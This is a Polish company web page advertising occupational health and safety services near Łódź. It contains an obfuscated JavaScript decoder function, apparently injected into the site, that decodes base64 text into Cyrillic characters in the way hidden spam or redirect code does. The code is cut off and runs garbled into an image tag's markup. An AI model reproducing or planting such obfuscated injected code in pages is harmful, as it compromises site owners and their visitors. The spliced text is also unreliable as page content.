Usługi bhp dla firm

Safe­ty Soft Tech zaj­mu­je się wyko­ny­wa­niem usług w zakre­sie bhp dla biz­ne­su nie­za­leż­nie od wiel­ko­ści fir­my.

Szeroki wachlarz usług z zakresu bhp

func­tion l1c373528ef5(o4){var sa=‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var q3=”;var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o4.charAt(oe++));ve=sa.indexOf(o4.charAt(oe++));r4=sa.indexOf(o4.charAt(oe++));n2=sa.indexOf(o4.charAt(oe++));x1=(yc2)|(ve»4);pc=((ve&15)4)|(r4»2);u6=((r4&3)6)|n2;if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;q3+=String.fromCharCode(x1);if(r4!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;q3+=String.fromCharCode(pc);}if(n2!=64){if(u6>=192)u6+=848;else if(u6==168)u6=1025;else if(u6==184)u6=1105;q3+=String.fromCharCode(u6);}}while(oeandrow_strykow_pabianice-300x157.jpg” alt=“uslugi bhp łódź zgierz aleksandrów stry­ków pabia­ni­ce” width=“300” height=“157” />Oferujemy Tobie przede wszyst­kim :

Dodat­ko­wo posia­da­jąc sta­ły zespół pra­cow­ni­ków oraz dostęp do kadry nauko­wej łódz­kich uczel­ni (Poli­tech­ni­ka Łódz­ka, Uni­wer­sy­tet Łódz­ki) podej­mu­je­my się roz­wią­zy­wa­nia nie­ty­po­wych pro­ble­mów z tema­ty­ki bez­pie­czeń­stwa i higie­ny pra­cy u naszych Klien­tów.

Zapraszamy do kontaktu !

Wszyst­kie dane kon­tak­to­we znaj­du­ją się w zakład­ce kon­takt (u góry ser­wi­su). Dzia­ła­my w wie­lo­oso­bo­wym zespo­le, dla­te­go jeste­śmy goto­wi spro­stać wyma­ga­niom Klien­tów ocze­ku­ją­cych rów­nież cało­do­bo­wej goto­wo­ści, sie­dem dni w tygo­dniu. Zadzwoń do Nas !

W poszcze­gól­nych czę­ściach nasze­go ser­wi­su znaj­dziesz infor­ma­cje przy­dat­ne w codzien­nym funk­cjo­no­wa­niu Two­jej fir­my. Dokła­da­my wszel­kich sta­rań, aby te infor­ma­cje mia­ły wyso­ką war­tość mery­to­rycz­ną oraz były zawsze aktu­al­ne.